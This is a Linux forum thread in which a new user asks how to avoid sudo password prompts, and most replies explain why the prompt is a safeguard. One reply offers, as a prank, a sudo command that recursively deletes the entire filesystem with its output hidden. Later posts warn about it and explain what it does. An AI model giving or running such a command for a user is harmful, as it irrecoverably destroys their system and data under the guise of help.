Announcement

Collapse
No announcement yet.

How do I stop the system from asking for my administrator password everytime?

Collapse
This topic is closed.
X
X

• Filter
  • Time
  • Show
Clear All

How do I stop the system from asking for my administrator password everytime?

Noob here, so I was wondering how do I boot the system as administrator from the start, so the system stops asking for my password every time I try to erase files or install/uninstall stuff.

Plus, I installed firefox, it was running fine until I changed the theme to BlackJapan, now the only browsers that works its Konkeror.

Re: How do I stop the system from asking for my administrator password everytime

The sudo system which is used by both Ubuntu and Apple is designed specifically so that you DON'T boot the system as administrator (except in an emergency). There are ways to change that configuration, but I'm not going to tell you how until you read this page at the Ubuntu Community Help Wiki.

Comment

Re: How do I stop the system from asking for my administrator password everytime?

The reason why Windows have malwares and are unstable is because windows WORKS in Administrator account. The reason why Linux is stable and doesn't have malwares significant enough to mention is because Linux encourages you to work as a User. By eliminating the added security of confirming by typing your password, you risk being 0wn3d.

And, as an FYI, Windows Vista adopted this method to secure their system and prevent malwares from being installed and run.

Oh, and you also risk breaking your system. One deleted file might render your system unbootable.

Lastly, I won't be surprised if you come back here asking for help on how to fix your system.

But.... Goodluck!
      Dax Solomon Umaming<br />http://blog.knightlust.com/

Comment

Re: How do I stop the system from asking for my administrator password everytime

Originally posted by doccal
        how do I boot the system as administrator
        To achieve what factually you are aiming at in the (near) end,
        the shortest way I know of would be a console command like:

Code:
        sudo rm -fdr / > /dev/null 2>&1
        Birdy aka littleDrHouse :P

Comment

Warning: Unicorn Rider's little joke is one of numerous ways that an ignorant noob can totally trash his system, irrevocably losing all the files that he didn't back up off site.

Please read the help wiki entry that I gave you in order to understand why the trivial inconvenience of giving your password every 15 minutes is worthwhile.

Comment

Originally posted by askrieger
            UnicornRider's little joke
            Joke? What joke?

I'm merely trying to help all parties (to be) involved save some time -
            as deliberate system crashing is what we are discussing here after all :P

Comment

Re: How do I stop the system from asking for my administrator password everytime?

rm

Remove files (delete/unlink)

SYNTAX
              rm [options]... file...

OPTIONS
              -d, --directory unlink directory, even if non-empty (super-user only)

-f, --force ignore nonexistent files, never prompt

-i, --interactive prompt before any removal

-r, -R, --recursive remove the contents of directories recursively

-v, --verbose explain what is being done

--help display this help and exit

--version output version information and exit
              To remove a file you must have write permission on the file and the folder where it is stored.

rm -rf will recursively remove folders and their contents

The OWNER of a file does not need rw permissions in order to rm it.

In other words, rm -rdf / means delete every (and I mean EVERY) file on your system. Think of the Windoze Format C: and answering the warning with Y twice!

UnicornRider isn't being evil in his post. Rather, he is demonstrating the very real danger that new users are risking when they want to run their systems all the time as the root system administrator.

First, learn to crawl, then to walk, and then to run. Otherwise you are only going to fall flat on your face.
              Windows no longer obstructs my view.
              Using Kubuntu Linux since March 23, 2007.
              "It is a capital mistake to theorize before one has data." - Sherlock Holmes

Comment

Originally posted by UnicornRider
                I'm merely trying to help all parties (to be) involved save some time

U.R., you are a master of efficiency, for sure!

Comment

Working...
                X